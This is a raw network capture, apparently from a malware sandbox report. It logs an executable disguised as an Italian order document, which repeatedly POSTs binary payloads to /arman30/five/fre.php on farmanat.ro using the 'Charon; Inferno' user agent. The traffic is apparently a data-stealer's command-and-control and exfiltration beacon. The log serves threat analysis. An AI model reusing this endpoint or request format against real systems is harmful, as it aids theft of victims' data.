                                              634192.168.11.2050479176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              635192.168.11.2050480176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              636192.168.11.2050481176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              637192.168.11.2050482176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              638192.168.11.2050483176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              639192.168.11.2050484176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              64192.168.11.2049900176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:41.968153000 CET6398OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:42.053039074 CET6398INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              640192.168.11.2050485176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              641192.168.11.2050486176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              642192.168.11.2050487176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              643192.168.11.2050488176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              644192.168.11.2050489176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              645192.168.11.2050490176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              646192.168.11.2050491176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              647192.168.11.2050492176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              648192.168.11.2050493176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              649192.168.11.2050494176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              65192.168.11.2049901176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:42.536148071 CET6399OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:42.619992971 CET6399INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              650192.168.11.2050495176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              651192.168.11.2050496176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              652192.168.11.2050497176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              653192.168.11.2050498176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              654192.168.11.2050499176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              655192.168.11.2050500176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              656192.168.11.2050501176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              657192.168.11.2050502176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              658192.168.11.2050503176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              659192.168.11.2050504176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              66192.168.11.2049902176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:43.112375975 CET6400OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:43.198436975 CET6401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              660192.168.11.2050505176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              661192.168.11.2050506176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              662192.168.11.2050507176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              663192.168.11.2050508176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              664192.168.11.2050509176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              665192.168.11.2050510176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              666192.168.11.2050511176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              667192.168.11.2050512176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              668192.168.11.2050513176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              669192.168.11.2050514176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              67192.168.11.2049903176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:43.645826101 CET6402OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:43.728280067 CET6402INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              670192.168.11.2050515176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              671192.168.11.2050516176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              672192.168.11.2050517176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              673192.168.11.2050518176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              674192.168.11.2050519176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              675192.168.11.2050520176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              676192.168.11.2050521176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              677192.168.11.2050522176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              678192.168.11.2050523176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              679192.168.11.2050524176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              68192.168.11.2049904176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:44.201690912 CET6403OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:44.288614988 CET6403INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              680192.168.11.2050525176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              681192.168.11.2050526176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              682192.168.11.2050527176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              683192.168.11.2050528176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              684192.168.11.2050529176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              685192.168.11.2050530176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              686192.168.11.2050531176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              687192.168.11.2050532176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              688192.168.11.2050533176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              689192.168.11.2050534176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              69192.168.11.2049905176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:44.811528921 CET6405OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:44.900487900 CET6405INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              690192.168.11.2050535176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              691192.168.11.2050536176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              692192.168.11.2050537176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              693192.168.11.2050538176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              694192.168.11.2050539176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              695192.168.11.2050540176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              696192.168.11.2050541176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              697192.168.11.2050542176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              698192.168.11.2050543176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              699192.168.11.2050544176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.11.2049826176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:04.640363932 CET6308OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:04.724145889 CET6309INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              70192.168.11.2049906176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:45.392079115 CET6406OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:45.483957052 CET6407INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              700192.168.11.2050545176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              701192.168.11.2050546176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              702192.168.11.2050547176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              703192.168.11.2050548176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              704192.168.11.2050549176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              705192.168.11.2050553176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              706192.168.11.2050554176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              707192.168.11.2050555176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              708192.168.11.2050556176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              709192.168.11.2050557176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              71192.168.11.2049907176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:45.989299059 CET6408OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:46.079950094 CET6408INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              710192.168.11.2050558176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              711192.168.11.2050559176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              712192.168.11.2050560176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              713192.168.11.2050561176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              714192.168.11.2050562176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              715192.168.11.2050563176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              716192.168.11.2050564176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              717192.168.11.2050565176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              718192.168.11.2050566176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              719192.168.11.2050567176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              72192.168.11.2049908176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:46.527621031 CET6409OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:46.613563061 CET6409INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              720192.168.11.2050568176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              721192.168.11.2050569176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              722192.168.11.2050570176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              723192.168.11.2050571176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              724192.168.11.2050572176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              725192.168.11.2050573176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
